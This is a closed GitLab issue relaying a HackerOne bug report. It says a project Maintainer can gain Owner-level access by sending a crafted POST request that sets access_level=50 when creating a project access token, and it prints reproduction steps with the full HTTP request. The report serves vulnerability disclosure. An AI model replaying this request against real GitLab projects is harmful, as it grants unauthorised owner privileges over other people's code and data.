Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #390696
Closed
Open
Issue created Feb 07, 2023 by GitLab SecurityBot@gitlab-securitybotReporter

Maintainer user can become owner of project

HackerOne report #1805549 by shubham_sohi on 2022-12-14, assigned to @fvpotvin:

Report | Attachments | How To Reproduce

Report

Summary

I have found a way that can be used by low privileged user to become owner of project.

NOTE:-

You need a premium GitLab account to verify the issue.

Steps to reproduce

1.Login into admin account.
2.Go to https://gitlab.com/projects/new and click on create blank project and create a project with name P.
3.Now in project P go to Project Information>Members and invite user A with Maintainer role.
Screenshot_(426).png
4.Now login into user A account.
5.In project P Go to Settings>Access Tokens, here user A can create access token.
6.But user A can only create access token for role Maintainer, Guest, Reporter and developer but does not have permission to create access token for owner role.
7.Now run below request in user A account with group_name and project_P_name.

POST /<-group_name->/<-project_P_name->/-/settings/access_tokens HTTP/2  
Host: gitlab.com  
Content-Length: 444  
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, /; q=0.01  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://gitlab.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://gitlab.com  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: { REDACTED }  
X-Csrf-Token: { REDACTED }

resource_access_token%5Bname%5D=ksjdf&resource_access_token%5Bexpires_at%5D=2023-01-13&resource_access_token%5Baccess_level%5D=50&resource_access_token%5Bscopes%5D%5B%5D=api&resource_access_token%5Bscopes%5D%5B%5D=read_api&resource_access_token%5Bscopes%5D%5B%5D=read_repository&resource_access_token%5Bscopes%5D%5B%5D=write_repository&resource_access_token%5Bscopes%5D%5B%5D=read_registry&resource_access_token%5Bscopes%5D%5B%5D=write_registry  

8.In response you will get new access token.
9.Now you can use this token to perform all action in project as admin.

Impact

Maintainer role user get owner privilege.

What is the expected correct behavior?

Maintainer role user should only able to create access token for Maintainer, Guest, Reporter and developer .

Output of checks

This bug happens on GitLab.com

Impact

Maintainer role user get owner privilege.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screenshot_(426).png

How To Reproduce

Please add reproducibility information to this section:

Assignee
Assign to
Time tracking